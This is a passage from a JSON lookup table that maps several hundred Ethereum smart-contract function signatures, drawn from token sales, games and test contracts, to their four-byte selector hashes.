"0xe4ac3206", "safeWithdrawalAmount(uint256)": "0x192a4422", "safeWithdrawalAll()": "0x4cf96509", "checkTokenBalance()": "0x4f731087", "closeCrowdSale()": "0x07537ad4", "IQTCrowdsale()": "0x91ce8ca9", "GOL()": "0x293528c9", "ISeeVoiceToken()": "0x09ab5008", "getBonusEgg(uint64)": "0xafd61d2c", "buyEgg()": "0x7d635502", "transform(uint64,uint64,uint64,uint64)": "0x085f8ebb", "checkAncestors(uint32,address,uint64,uint64,uint64)": "0x9bd7d688", "removeHatchingTime()": "0xa3c07c6a", "hatchEgg()": "0xca9c4b33", "layEgg(uint64)": "0xeb14367d", "canLayEgg(uint64,uint32,uint32)": "0xb62d4ce1", "calculateMaxEggG0(uint64)": "0x2f6a6e20", "getClassCheckOwner(uint64,address)": "0xe98f402c", "getObjClassId(uint64)": "0x90f2dc88", "getGen0ObjInfo(uint64)": "0xd2fb32c2", "removeRandomClass(uint32)": "0xbc602ab7", "addRandomClass(uint32)": "0xa15b9769", "genLevelExp()": "0x33ced321", "setConfig(uint256,uint256)": "0x1e34c585", "setConfigClass(uint32,uint8,uint8,uint8,uint32)": "0x6a81af17", "updateHatchingRange(uint16,uint16)": "0x418bc2ee", "setOriginalPriceGen0()": "0x66ba2670", "addNewObj(address,uint32)": "0xe91b6987", "getRandom(uint16,uint8,address)": "0xc5442f7d", "EtheremonTransform(address,address,address,address,address)": "0x5b174f0b", "getMonsterLevel(uint64)": "0xd2169d2f", "getReturnFromMonster(uint64)": "0x464299f9", "getTrainerEarn(address)": "0xbc62c89a", "getGen0COnfig(uint32)": "0xecff537f", "setTranformed(uint64,uint64)": "0x54b67057", "addEgg(uint64,uint32,address,uint256)": "0x0bc954dc", "setHatchedEgg(uint64,uint64)": "0x37bd1868", "setHatchTime(uint64,uint256)": "0xe177573c", "countEgg(uint64)": "0xec0ba006", "getTranformedId(uint64)": "0xfd7d7948", "getHatchingEggData(address)": "0x710ad128", "getHatchingEggId(address)": "0xaeb669eb", "LanaCharleenToken(uint256,string,string)": "0x92cfebd6", "KillContracts()": "0x0bf9236a", "DeleteImage(uint256)": "0xf8524236", "ChangeImage(string,uint256)": "0xb04464cd", "InsertImage(string)": "0x50364825", "SetDescript(string)": "0x1d32f29a", "SetProjectTag(string)": "0xa9e044ae", "SetProjectName(string)": "0xf83e3f5a", "ethworld()": "0x4696890e", "TempleDonationTrackingNote()": "0x2c270617", "Afin()": "0x0256c7f5", "_withdrawTo(address)": "0x0e5c6a3d", "_removeAvatar(address)": "0xed70e032", "_setAvatarIfNoAvatarIsSet(address,uint256)": "0x2b644ac8", "getAvatar(address)": "0xce8ac033", "setAvatar(uint256)": "0xdf0bcf4d", "Ethmoji()": "0xf1287aef", "setGlobalCompositionFee(uint256)": "0x1875ccf3", "_isUnique(uint256[],uint256)": "0xaaf809f8", "_getNextTokenId()": "0x972d1ae2", "_setCompositionPrice(uint256,uint256)": "0x6c064d63", "_tokenLayersExist(uint256)": "0x0c7befb2", "_trim(uint256[],uint256)": "0xd30592c6", "_isValidWithCompositions(uint256[],uint256)": "0xd8420e3a", "_isValidBaseLayersOnly(uint256[],uint256)": "0x44afda9c", "setCompositionPrice(uint256,uint256)": "0xd5e0d8fc", "getTotalCompositionPrice(uint256[])": "0x1983111d", "getCompositionPrice(uint256)": "0x1f89e911", "isValidComposition(uint256[],uint256)": "0xd2769df1", "getTokenLayers(uint256)": "0xaae07cd0", "compose(uint256[],uint256)": "0x03083883", "mintTo(address,uint256,uint256)": "0x2baf2acb", "KairosToken()": "0x1013ad53", "MultiTransfer()": "0x4828a833", "EthsMePresale(address,address)": "0x012874a3", "giveReward(uint256[4],uint32,uint8,bool,uint32[4])": "0xe7b1983e", "createNewCombination(address)": "0x94af9da8", "enterDungeon(uint256[4],uint32)": "0xfa99d7ae", "CryptoSagaDungeonVer1(address,address,address,address,address,uint32,uint256,uint256,uint32,uint256,uint32,uint32,uint32[4],bool)": "0x1f887d56", "setPossibleMobs(uint32[])": "0x063ca521", "setRequiredProgressOfPreviousDungeon(uint32)": "0x34eb3200", "setPreviousDungeoonId(uint32)": "0x4cc78983", "setInitialEnemyCombination(uint32[4])": "0x87a97752", "setCoolDungeon(uint32)": "0x3872b3ec", "getLastPlayDateTime(address,address)": "0x383fcd3a", "getInitialEnemyCombination()": "0xdb7f1e6b", "getEnemyCombinationOfAddress(address,address)": "0xa01a478c", "ProofOfRarePepe()": "0x662fa2fb", "PaylessMinisplit()": "0xfe2cce6f", "finalizeSeedSale()": "0xb17346fd", "transferPrivateReservedUFT(address,uint256)": "0xb9f1fb62", "vestingToken(address)": "0x82484a36", "seedSaleTokenLeft(address)": "0x424599c4", "validationFailed(address)": "0x50f462a4", "validationPassed(address)": "0xdc5b041b", "nextTier()": "0x6a5371b8", "HumanTokenAllocator(address,address,address,address,address)": "0xd09fbcee", "fillSell(address[8],uint256[6],uint8,bytes32,bytes32)": "0xedb5d946", "fillBuy(address[8],uint256[6],uint8,bytes32,bytes32)": "0xd6b93d43", "validateOrder(address,uint256,address,address,uint256,address,uint256,uint256)": "0xc6dd5db5", "setTotle(address)": "0x2183e390", "AirSwapHandler(address,address,address)": "0x6e2653ca", "getDeployedMatches()": "0x9666cbfa", "createMatch(string,string,uint256,uint256)": "0x935146d0", "MatchBettingFactory(address)": "0xe4322464", "ledgerUserBetContribution(address)": "0x76753b04", "userBetContribution(address)": "0xad188be0", "getBetters()": "0xfbf9dab7", "setStopMatchBetting()": "0xf8065ed6", "setMatchOutcome(uint256,string)": "0xe0a49f14", "MatchBetting(string,string,uint256,address,address,uint256)": "0x9961476c", "batchdrop(address[],uint256[])": "0xad4b2ca4", "Batchdrop(address)": "0xac6fe0ed", "ShroomeryFarmer()": "0x86913884", "transferICOTokens(address,uint256)": "0xaf30e9f7", "withdrawDivs()": "0x9ddf840d", "CryptohomaToken()": "0xe80d60b8", "RBCToken()": "0x0c192fe5", "ednation()": "0x69e8d80f", "checkifCapHasReached()": "0x7bb0b3c6", "refundContribution(address,uint256)": "0xb25ba6a7", "batchTransferToken(address[])": "0x230614fb", "manualBatchTransferToken(uint256[],address[])": "0x5b6accb2", "transferToken(address)": "0xdeebeac9", "tokenSalesCapReached()": "0xb4706fa1", "preTokenSalesCapReached()": "0xb79a5539", "isTokenSaleActive()": "0x98a6a6c0", "isPreTokenSaleActive()": "0xb4421cbd", "isContributionAllowed()": "0xeb94eecb", "AttributaOwners()": "0x8e690315", "VAPEbits()": "0x072b8277", "doWithdrawal(uint256)": "0x5ea3ad0a", "quickWithdraw()": "0x72a2d90c", "calculateReward(uint256)": "0xd2d7231f", "withdrawalComplete()": "0x8dd7e44b", "withdrawalInitiate()": "0xdcc6762c", "SONICToken(string,uint8,string)": "0xcdfd7474", "Zoltan()": "0xeb31f3d0", "setBGXTokenInterface(address)": "0x7d6fb089", "setTeams(address[],uint256[])": "0x5ac36d70", "setBounty(address[],uint256[])": "0x56d906c7", "setAdvisers(address[],uint256[])": "0x1f0a21ad", "sendToTeam()": "0x4f9660ed", "blackListSwithcer(address)": "0x50ec5903", "sendNow(uint256)": "0x9faefe0c", "pauseStateSwithcer()": "0x476a29e2", "_startCounter()": "0xd4631019", "setCaps(uint256,uint256)": "0x212bf316", "setCrowdsaleDate(uint256,uint256,uint256,uint256)": "0x474ceb4d", "setBgxWalletAddress(address)": "0xf32113d5", "ANIToken(uint256,string,string)": "0x600c200e", "turnOff(address)": "0xb547a726", "turnOn(address)": "0x20f0751d", "YourPyramid()": "0x046ae3c2", "bitm(uint256,string,uint8,string)": "0x284237e4", "Callous()": "0x7247aafd", "refundErrCombat(uint256)": "0x293d7663", "userVoteFor(address,uint256,uint256,uint256)": "0xb4402991", "voteFor(uint256,uint256)": "0x00c2b78e", "invalidateCombat(uint256)": "0x05ccfddd", "getCombatsCount()": "0x6066ed11", "getCombat(uint256)": "0x2b4cbcc3", "addCombat(uint128,uint128,bytes32)": "0xbd516e04", "myBonus(uint256)": "0xb84cc017", "setCombatWonTeam(uint256,uint128)": "0x8c19d2ca", "markCombatEnded(uint256)": "0xa5f02b00", "markCombatStarted(uint256)": "0x2dea5f6d", "closeImports()": "0x7001fcc2", "Electrium(uint256,string,uint8,string)": "0x342e515c", "UniversalGiftToken()": "0xa6e5291f", "tradeBancor(address[],uint256,uint256,address)": "0x69add113", "tradeEtherDelta(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,uint256)": "0x6322bb39", "widthdrawEtherDelta(uint256)": "0x1d786cd0", "tradeKyber(address,uint256,uint256,address)": "0x8df301aa", "tradeAirswap(address,uint256,address,uint256,uint256,uint8,bytes32,bytes32)": "0x313f5a57", "trade(address,uint256,address,address,uint256,uint256,address)": "0xcb3c28c7", "setHash(uint256,string)": "0x2fbaba26", "IPFSStore()": "0x94e4c808", "_getPurchaseToken(address,uint256)": "0xe949fba1", "changeWhitelistCornerstoneStatuses(address[],bool)": "0x201e8f0e", "changeWhitelistCornerstoneStatus(address,bool)": "0x3b427b20", "changeWhitelistPrivateStatuses(address[],bool)": "0xf9df816a", "changeWhitelistPrivateStatus(address,bool)": "0xc1c6c749", "LBTokenSale(uint256,uint256,uint256)": "0x6dce14cd", "GetcrowdsaleContract()": "0x130985f4", "removeCrowdsaleContract(address,address)": "0xca36226d", "sendOwnerBalance(address,address,uint256)": "0x02d1c1e6", "sendCrowdsaleBalance(address,address,uint256)": "0xac5c867c", "getdecimals()": "0xb20e5a79", "GemsToken()": "0xe7c8dd6d", "getAuctionInfo(uint256)": "0xfc3fc4ed", "auctionCancel(uint256)": "0x3af826a4", "getTittyOwner(uint256)": "0xad0d3713", "CTAuction(address,address)": "0x69443bf4", "IMARK()": "0x7742ede4", "VIRES()": "0x1d96d4c9", "setPriceLocked(bool)": "0x0932c3c6", "getToken(uint256,uint256)": "0xa4fd3cea", "deleteLayer(uint256)": "0xde67fd05", "addLayer(address,uint256,bytes32)": "0x22c5b279", "purchase(uint256,uint256)": "0x70876c98", "transferFrom(address,uint256,uint256)": "0x77dbbd76", "setPrice(uint256,uint256,uint256)": "0xaa585d56", "takeOwnership(uint256,uint256)": "0x06c18600", "EOEToken()": "0x60319f71", "MRC()": "0x78ec383a", "IFLTSidechain()": "0xf6054027", "sendCoinsToBeneficiary()": "0x0b8f0b61", "UmbrellaCoin()": "0x5ccb4f8f", "BffDoomToken()": "0x849d16d2", "LyuTestToken()": "0xbba02bf8", "TestToken5(address,address,address,address,address,address,address,address)": "0x36b97fd5", "GameSpiritCoin()": "0x42c469e0", "checkValidityOfBalance()": "0x5c978499", "tokenPriceInWeiForDay(uint256)": "0x01395d33", "calcTokenPriceInWei()": "0xeff877e2", "weiToTokens(uint256,uint256)": "0xb704b608", "tokensToWei(uint256,uint256)": "0xf4a8cbc0", "setPriceSetter(address)": "0x63791e3c", "unfixTokenPriceInWei()": "0xf5751524", "setAndFixTokenPriceInWei(uint256)": "0x0f6f5f98", "setState(string)": "0x68794b87", "priceSetter()": "0x2c09bef7", "firstEntranceToSaleStateUNIX()": "0xbe140381", "bank()": "0x76cdb03b", "tokenPriceInWei()": "0x2f8de810", "pendingWithdrawals(address)": "0xf3f43703", "byTokens()": "0xdec32ae8", "transferAllAndCall(address,bytes)": "0xd87692d9", "initContract()": "0x8203f5fe", "PonziToken()": "0x9e551567", "BeatOrgTokenMainSale(address)": "0x8238b968", "SLRC()": "0xd1104bd3", "POLE()": "0x759234ec", "QUAK()": "0xbb9efdc6", "MyToken(string,string,uint256,uint256,address,address)": "0x4baaab80", "KangGuo()": "0x1f065f56", "setAuthorized(address,address,bool)": "0xe4d0f41d", "canTransfer(address,address,uint256)": "0xe46638e6", "doSend(address,address,uint256)": "0x2e0eb943", "isMultiple(uint256)": "0x6ee78aea", "requireOk(bytes1)": "0xfa044862", "isOk(bytes1)": "0xd53beee4", "check(address,address,address,uint256)": "0x4277b5b1", "check(address,address)": "0xb3154db0", "MANHATTANPROXYMADISONAVE()": "0xd0988149", "UpdateBeneficiary(address)": "0xe6131a64", "EnableTransfer()": "0xaf7d697e", "DisableTransfer()": "0xb5268fa4", "WMCToken()": "0x9ae8b6a1", "BDSMtoken()": "0x85867cd5", "SieChain()": "0x24887c04", "freeze(address)": "0x8d1fdf2f", "IPOcoinHotelShares()": "0xef37f061", "LongToken(uint256,string,string,uint256)": "0xbd149031", "GigaProfitIn(uint256,string,string)": "0x0a94031c", "PreICO()": "0x10c2a365", "TheGambler()": "0x0f30c971", "remainingEPXSupply()": "0x1de1441f", "initialEPXSupply()": "0x670be445", "EPXCrowdsale()": "0x48e9f1ea", "FindID(address)": "0xc2f7c50a", "Realize(uint256)": "0xd6b2b242", "HodlEth(address,uint256)": "0x0de94e4a", "DCCAdvancedToken(uint256,string,string)": "0x6a86a0f0", "TokenDCCB(uint256,string,string)": "0x9b6349a8", "remainingTokenForSale()": "0xf72ae72c", "_addToClaimList(address,uint256)": "0x24efe4c3", "countClaimBackers()": "0x8cece594", "checkClaimTokenByAddress(address)": "0x4cec73b1", "checkClaimTokenByIndex(uint256)": "0xbab6d101", "ClaimCrowdsale(uint256)": "0xb7808600", "CappedCrowdsale(uint256,uint256)": "0xf1455328", "hasOpening()": "0xf76543e9", "_preValidatePurchase(address,uint256,uint256)": "0xbc73a7e4", "updateUsdEthRate(uint256)": "0x794df640", "deauthorize(address,address)": "0x6d892f7e", "authorize(address,address)": "0x2bef4595", "VeryToken()": "0xb74db274", "amIin()": "0x83d6236c", "checkAccount(address)": "0x69921c26", "buyMessage()": "0xf0df232f", "getUserReactionCount()": "0x75218a54", "sendReaction(address,int8,string)": "0xc44cd4df", "getUserReaction(uint256)": "0xb957aeb6", "addUser(string)": "0x18b8275a", "setUpgradeableTarget(address)": "0x802049ac", "MitCoin()": "0xfc091b71", "transferTokens(address[],address)": "0x0f228087", "setColdWallet2(address)": "0x65a8a483", "setColdWallet1(address)": "0xa07ead73", "setColdWallet1SplitPercentage(uint256)": "0x917180c7", "removeDepositCreator(address)": "0x0424d979", "addDepositCreator(address)": "0xe894326c", "createChildDeposits(uint256)": "0x9bc6f0ec", "MasterDeposit(address,address,uint256)": "0xa625d78d", "ReferalsTokenHolder(address)": "0xe60a72bc", "SellableFund(uint256)": "0x0a6076b3", "triggerTansferEvent(address,address,uint256)": "0xf36d29e7", "transferEth(address,uint256)": "0xe9bb84c2", "Token(string,bytes32)": "0xda683c63", "Divide(uint256,uint256)": "0xb048546f", "Multiply(uint256,uint256)": "0xf8eac151", "Subtraction(uint256,uint256)": "0xd0130009", "Addition(uint256,uint256)": "0xee331490", "chargeFee(address,address,uint256)": "0x3d1aa963", "exchangeRate()": "0x3ba0b9a9", "getAddressesSet()": "0x3f7525bf", "countAddressesSet()": "0xd27399b5", "includesAddressesSet(address)": "0x92e1ab17", "removeAddressesSet(address)": "0x3618c2a2", "addAddressesSet(address)": "0x616f7bc9", "getSet()": "0x31f070d9", "countSet()": "0x4ea05686", "includesSet(bytes32)": "0xaec9c480", "removeSet(bytes32)": "0xb6700930", "addSet(bytes32)": "0x4a7160a2", "getAddressUIntMapping(address)": "0x494cf333", "setAddressUIntMapping(address,uint256)": "0xe1281280", "getMapping(bytes32)": "0xe2c14bdd", "setMapping(bytes32,bytes32)": "0x01d97f08", "getUInt()": "0xb6e456bb", "reinit()": "0xc482ceaf", "parseBool(string)": "0x974ef924", "getBytes(string,uint256,uint256)": "0x7fdfbe1b", "parse(string,uint256)": "0x5d895dac", "init(uint256)": "0xb7b0422d", "addThing(string,string,bytes32,bytes32)": "0x47f66790", "setInvestorDataAndIssueNewToken(address,uint256,uint256,uint256)": "0xf04cb80c", "setInvestorData(address,uint256,uint256,uint256)": "0x16164e15", "getRestoredTransactionStatus(uint256)": "0xed2f5b1a", "removeAttestation(address)": "0x49fa991f", "attestForIdentity(address)": "0x9c09c3bb", "testPrivate()": "0xc24977cf", "testExternal()": "0x42e8051c", "testPublic()": "0xf5fda8cd", "func1()": "0x74135154", "testExternal(uint256[20])": "0xc827a7bb", "testInternal(uint256)": "0xe8a61357", "testPrivate(uint256)": "0x7f4db7fb", "testPublic(uint256[20])": "0x4974af1f", "onlyWhitelistedCanDoThis()": "0xe9cac389", "decrementNumber()": "0x871cc9d4", "incrementNumber()": "0x273ea3e3", "fetchNumber()": "0x8090b131", "ArithValue()": "0xe3399538", "changeModuleOwner(string,string,address)": "0x197d24ad", "addActionToRole(string,string,string)": "0x7f37fab6", "moduleIsExist(string)": "0x6fe356ea", "updModule(string)": "0x6552a562", "addRole(string)": "0x3e96e868", "addAction(string)": "0x1cf9c88a", "addMenu(string)": "0xef94ce1e", "addContract(string)": "0xd611225b", "addModule(string)": "0xbbd1e186", "BaseModule()": "0x33aac4aa", "set(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xc5ef4c3e", "setNewUserState(string,bytes,string)": "0x24af4cdb", "getUserState(address)": "0x416ae768", "getOwnUserState()": "0x03c0bfb5", "LykkeTokenBase(address,string,uint8,string,string)": "0xe77df041", "setCurrent(uint256)": "0x01738ecd", "current()": "0x9fa6a6e3", "canWriteName(address,bytes32)": "0x906e1ec0", "canReadName(address,bytes32)": "0x49ae9b31", "getNameWriterId(bytes32)": "0xc32aaa86", "getNameReaderId(bytes32)": "0x40722e3e", "setNameWriterId(bytes32,bytes32)": "0x498a3944", "setNameReaderId(bytes32,bytes32)": "0x48c4cae9", "getNameHash(bytes32)": "0x1dd1349d", "setNameHashByWriter(bytes32,address,bytes32)": "0x189b600c", "ChronoMint(int256,address,address,address)": "0xd15cfa25", "approveContract(address)": "0x07f7aafb", "addLOCtoLHT(address,address)": "0x63f225a7", "proposeLaborHourToken(address)": "0x77aad873", "getLOCCount()": "0x23400cf6", "getLOCbyID(uint256)": "0xcdefe704", "proposeLOC(string,address,uint256,string,uint256)": "0x5a4426bc", "setContractValue(address,string,uint256)": "0x22636e65", "setValue(string,uint256)": "0x7c2da7aa", "getValue(string)": "0x960384a0", "isCBE(address)": "0x52306f4a", "getAddress(string)": "0xbf40fac1", "onTokenReceived(address,uint256,bytes)": "0xbed25542", "MockGetTogether()": "0xedb0f2ca", "AttestationManager()": "0x4b8574ad", "validateBySymbol(string)": "0x2506bfe7", "createNew(string)": "0x7520767f", "InsuranceMasterContract()": "0xb662ef9c", "clearRequests(bytes32)": "0xdcbfe3d5", "addRequest(string)": "0x128d7215", "completeClosed()": "0x638b4463", "completeFailed()": "0xeda20bc9", "stopCollection()": "0x8d49da75", "startCollection()": "0x085a1daa", "tick()": "0x3eaf5d9f", "deductExtraBalance(address,uint256)": "0x4ca92e08", "addExtraBalance(address,uint256)": "0x89b2050b", "transferMonster(address,address,uint64)": "0x809d9a94", "collectAllReturnBalance(address)": "0x69666811", "clearMonsterReturnBalance(uint64)": "0xb0c6d7df", "addMonsterIdMapping(address,uint64)": "0x9248019e", "removeMonsterIdMapping(address,uint64)": "0x60c6ccb2", "decreaseMonsterExp(uint64,uint32)": "0x31afa55f", "increaseMonsterExp(uint64,uint32)": "0x5643a711", "setMonsterObj(uint64,string,uint32,uint32,uint32)": "0x32666a31", "addMonsterObj(uint32,address,string)": "0xfc4d20f5", "setMonsterClass(uint32,uint256,uint256,bool)": "0xc8ff80a1", "RemoveModerator(address)": "0xb85d6275", "AddModerator(address)": "0x6c81fd6d", "BasicAccessControl()": "0x754f9b37", "tokensToEthereum_(uint256)": "0xbf3b397b", "ethereumToTokens_(uint256)": "0x2a9121c7", "purchaseTokens(uint256,address)": "0x504cceac", "excludeAmbassadors(uint256,address)": "0x2069fc46", "disableWhitelist()": "0xd6b0f484", "calculateEthereumReceived(uint256)": "0x22609373", "calculateTokensReceived(uint256)": "0x10d0ffdd", "dividendsOf(address)": "0x0065318b", "myDividends(bool)": "0x688abbf7", "myTokens()": "0x949e8acd", "totalEthereumBalance()": "0x6b2f4632", "setSymbol(string)": "0xb84c8246", "setStakingRequirement(uint256)": "0x8328b610", "setAdministrator(bytes32,bool)": "0x89135ae9", "exit()": "0xe9fad8ee", "getStopReceive()": "0x7ab21613", "setStopReceive(bool)": "0x620346c6", "NPXSToken()": "0xa424fa49", "WithdrawVault(address)": "0x794d0d8d", "boolToUInt(bool)": "0xffbd400b", "boolFunc(bool,bool)": "0x66125b25", "boolToBytes32(bool)": "0x32958fcb", "boolMemoryArray()": "0x51e1d427", "boolToInt(bool)": "0x5192f3c0", "boolCallWithArray(bool[4])": "0xbf22d670", "booleanToUInt()": "0xe6744035", "test_bytes(bytes)": "0xa90fdf20", "bytes32ToBytes(bytes32)": "0x4c0999c7", "bytes20ToString(bytes20)": "0xc060ac53", "bytesToUInt(bytes)": "0x74c1328a", "bytesToUInt(bytes32)": "0x81a33a6f", "bytesFunc(bytes)": "0xf6585116", "get_firstbytes(address)": "0xc6430e29", "bytes32ToString(bytes32)": "0x9201de55", "bytes32Func(bytes32)": "0xe5db1a68", "bytes32ToBytes(bytes32[],bytes32)": "0xde02ae96", "bytesCallWithArray(bytes32[4])": "0x6bbf592d", "stringandbytes()": "0xbfb7d9f6", "bytesToUint(int256,bytes)": "0x4193b8b7", "bytes32_to_bytes(bytes,bytes)": "0x92f1fc7d", "bytesMemoryArray()": "0xace80e0d", "stringToBytes32(string)": "0xcfb51928", "stringToUint(int256,string)": "0x222af991", "stringToBytes(string)": "0xe106fb4b", "_stringsEqual(string)": "0xd416c997", "date_string(int8,int8,int16)": "0x34bafed3", "stringToSig(string)": "0x7c34752f", "_stringGas(string)": "0x05dd23f7", "uint2str()": "0xedfd786e", "stringsEqual(string)": "0x543e0a7b", "uintFloor(uint256,uint256)": "0xc8738351", "JSONpath_string(string,string)": "0xd8dbb475", "uintMax()": "0x35d9ceee", "uintCeil(uint256,uint256)": "0x52bddee6", "uintToBytes(uint256)": "0x94e8767d", "uint256At(bytes,uint256)": "0xacc0a246", "uintInArray(uint256,int256,uint256[],uint256)": "0x16c24739", "uintFunc(uint256,uint256)": "0x2faa3014", "uintRound(uint256,uint256)": "0x4d305073", "TokenMintPoD()": "0xc6ed3418", "unhint(bytes32)": "0x7c8c6643", "testMintAuth()": "0x1e7a5bf7", "test_insert_findWithHintNextAtPosition()": "0x0696647a", "setUint64(uint64)": "0x822cba69", "testMintInvalid()": "0x3f7b2ea9", "test_updateKey_increaseNoHint()": "0x6ce6833d", "testEqualityUint()": "0x5577e89f", "intMin()": "0x565b3324", "findAddressByEndpoint(string)": "0x460123cf", "getUint256Min()": "0x115e9375", "test_insert_findWithHintPrevRemoved()": "0xe8944564", "mintParts(uint16,address)": "0x4584117e", "intCallWithArray(uint8[4])": "0x2cbfd034", "getOnMintAmountValue()": "0xfa9768c9", "mint(uint256,string)": "0x77097fc8", "printQuotation()": "0xa38b9a19", "testMintGuy()": "0x10a20b4c", "setConstraint(bytes32,bool,bool)": "0x696a7253", "testFailMintNoAuth()": "0xb747e025", "mint(address,uint256,bool,uint32)": "0xb5e73249", "getUint256()": "0x68895979", "setUint256(uint256)": "0xd2282dc5", "mint(uint256,address)": "0x94bf804d", "mint(uint256,bytes32)": "0x1801fbe5", "multiMint(address[],uint256[])": "0x2f81bc71", "releaseByStage(address)": "0xc8c21594", "releaseOldBalanceOf(address)": "0x88ef59fb", "gatherAllOldBalanceOf(address[])": "0x04165443", "gatherOldBalanceOf(address)": "0xe96309e7", "setReleasedAddress(address,address)": "0xdaaa6b5d", "releaseWithStage(address,address)": "0x0c915c74", "_cappedReward(uint256)": "0x14c239a9", "_sendReward(uint256)": "0x339e9550", "_taskError(string)": "0x665b0d5b", "refreshMonarchyGamesReward()": "0x01303778", "refreshMonarchyGames()": "0x4091f4c6", "startMonarchyGameReward()": "0x5582c08d", "startMonarchyGame(uint256)": "0xc87022d3", "sendProfitsReward(address)": "0x3c8766c6", "doSendProfits(address)": "0xcb338436", "issueDividendReward()": "0x3a9c0ae7", "doIssueDividend()": "0xf0bae2c5", "setMonarchyRewards(uint256,uint256)": "0xf01cc531", "setSendProfitsReward(uint256)": "0xb63deb24", "setIssueDividendReward(uint256)": "0x0f6d6236", "getDailyLimitRemaining()": "0x2b791053", "getDailyLimitUsed()": "0x427654da", "getDailyLimit()": "0xa6895b5a", "updateAndGetRemaining()": "0x8d89873c", "_useFromDailyLimit(uint256)": "0xe8884aee", "getMonarchyController()": "0x6774f8e1", "getIsStartable(uint256)": "0xa04bd02f", "getInitialPrize(uint256)": "0x7a3dbc16", "getAvailableFees()": "0x40806f7c", "getNumEndableGames()": "0x15f2eb87", "getFirstStartableIndex()": "0x3e6c0637", "startDefinedGame(uint256)": "0x5b9b44bf", "refreshGames()": "0x2867bc92", "Prether()": "0xf8651d56", "ProToken(uint256,string,uint8,string)": "0x4052c02a", "WeAPOWH()": "0xd59cf17f", "NIU(uint256,string,uint8,string)": "0xfaf9859c", "GlobaLiquids()": "0xde0bffc2", "SapienToken()": "0x8dc949e8", "transferBatchIdempotent(address[],uint256[],bool)": "0xd997a153", "transferWithPurpose(address,uint256,bytes)": "0xf61ca773", "renounceOwnershipForever(uint8)": "0xde940c29", "GMET()": "0xa0fb7f57", "aicontract()": "0x00027737", "DatCoin()": "0x61df46f6", "ECN(uint256,string,string)": "0x79987504", "Hellina()": "0x23063da2", "LocusToken()": "0x5789a722", "BLB()": "0xbfa54b3f", "destroyBottle()": "0xfc303ef1", "addComment(string)": "0x843b4386", "CryptoSilver()": "0xb7f53c91", "mintInitialTokens(address,uint256)": "0x8aa08617", "mintICOTokensFromExternal(address,uint256)": "0xae4a7512", "mintICOTokens(address,uint256,uint256)": "0x4cd85837", "setIcoCloseTime(uint256)": "0xad1922b0", "getRcdExchange(uint256)": "0x7df2e3e3", "getMinMaxInvest()": "0xb8e2cfb1", "RECORDICO(address,address,uint256,uint256,uint256,uint256)": "0x730a3127", "isAddressLocked(address)": "0xe52e9f15", "FuckToken(uint256,string,uint8,string)": "0xd7e8015a", "TAJ()": "0xbf7408de", "writeMessage(string,string,string,string)": "0x566c20fc", "tokenTosale()": "0x74d9c2ef", "notEmpty()": "0x68cff8a9", "unfrozen()": "0xa0340625", "XRRfrozen()": "0x0107a4eb", "CesiraeToken()": "0x50de84c1", "DeDeContract(address,address,address,uint256,uint256,address,address,uint256)": "0x65b7a89d", "Bettereum()": "0x5792b512", "withdraw_to_eti()": "0x33c7b38f", "whitelist_pool(address,address,uint256)": "0x0c8e9977", "EtherIncPrivate()": "0xcfecd73d", "endprivateIco(bool)": "0xfd208ca7", "safeassert(bool)": "0xa983d414", "APSP()": "0x79132085", "CYFR()": "0xe71d3ae2", "kkICOTest80()": "0xea760a6b", "setStartBalance(uint256)": "0x5364e45d", "VitManToken()": "0x72d4b93c", "_touched(address,address)": "0xa4f939a1", "setWeights(uint256[])": "0x1460b505", "_setWeights(uint256[])": "0x9fb3b7dc", "_mint(address,uint256,uint256[])": "0x7777789f", "mintFirstTokens(address,uint256,uint256[])": "0xe82c6e8a", "updateHighestMiles_(uint256,address)": "0xb8e4189c", "updateHighestPrices_(uint256,address)": "0x85e99be4", "parseInt_(uint256)": "0x778e388e", "getFromList_(uint8,uint256)": "0x7d0f7528", "getHolidayByIndex_(uint256)": "0x745911d5", "getDayIndex_(uint256)": "0xfee21471", "calculateDayOwnerCut_(uint256)": "0x5614678c", "updateLeaders_(address,uint256)": "0xb7403878", "withdrawFor_(address)": "0x889f0c99", "handlePayouts_(uint256,uint256,uint256,address,address,address)": "0x67571f68", "takeTheTorch_(uint256,address,address)": "0x97a7cfb4", "getHighestMilesOwnerAt(uint256)": "0x6bb7f98e", "getHighestMilesAt(uint256)": "0x43212c3c", "getHighestPriceOwnerAt(uint256)": "0xa8d95496", "getHighestPriceAt(uint256)": "0xd9cfc182", "verifiedTransferFrom(address,address,uint256,uint256,uint256,uint256)": "0xd4346010", "unverify(address,address)": "0x66fa6efb", "isVerified(address,address)": "0x0b9aa067", "fund(address,address,uint256,uint256,uint256)": "0x13a46827", "create(address,address,address,uint256,uint256,uint256,uint256)": "0x4b20ae39", "callerTokenAmountAtBlock(uint256)": "0xf61cd7de", "generate(address,bytes)": "0x2c84bfa6", "MerkleMine(address,bytes32,uint256,uint256,uint256,uint256,uint256,uint256)": "0x454d9bb4", "setCrowdsaleContract(address,address)": "0x70985eb6", "isTransferLocked()": "0xa01c62f7", "returnRegDate(address)": "0x5f7a7bb5", "returnHolder(uint256)": "0x560791a9", "returnPayees()": "0xa8836844", "returnBalance(address)": "0x264b2b8e", "setTotal(uint256)": "0x1f8d1d50", "notInArray(address)": "0xd465abca", "changeBalance(address,uint256)": "0xf529d448", "getRate(string)": "0x6c0daed8", "updateRates(uint256[])": "0x4bb77d9d", "updateRate(string,uint256)": "0x1e77b2e0", "refundPayment(address)": "0x6d49817b", "ReservationFund(address)": "0x5f6d0ded", "onCrowdsaleEnd()": "0x6252c127", "contributionsOf(address)": "0x3af0dbc1", "processContribution(address,uint256,uint256)": "0xef8b0e15", "completeContribution(address)": "0x31aa91fc", "canCompleteContribution(address)": "0xf50a2644", "processReservationFundContribution(address,uint256,uint256)": "0x37033be6", "isContributorInLists(address)": "0x772fdcb1", "getSoftCap()": "0x4d52a512", "transferBack(address,uint256)": "0xc8f2835f", "startSlammerTime(address,uint256[5],address,uint256[5])": "0x291cef95", "drainStack(bytes32,bytes32)": "0x6a897999", "throwSlammerEvent(bytes32,address,address,uint256[10])": "0xba6dc506", "throwSlammer(bytes32,bytes32,bytes32)": "0xde150d5d", "raiseSlammer(bytes32,bytes32,bytes32)": "0x40b8783d", "endCoinFlip(bytes32,bytes32,bytes32)": "0x4bd8ae6f", "startCoinFlip(bytes32,bytes32,bytes32)": "0xe6e35407", "getMixedStack(bytes32)": "0x435ad5c1", 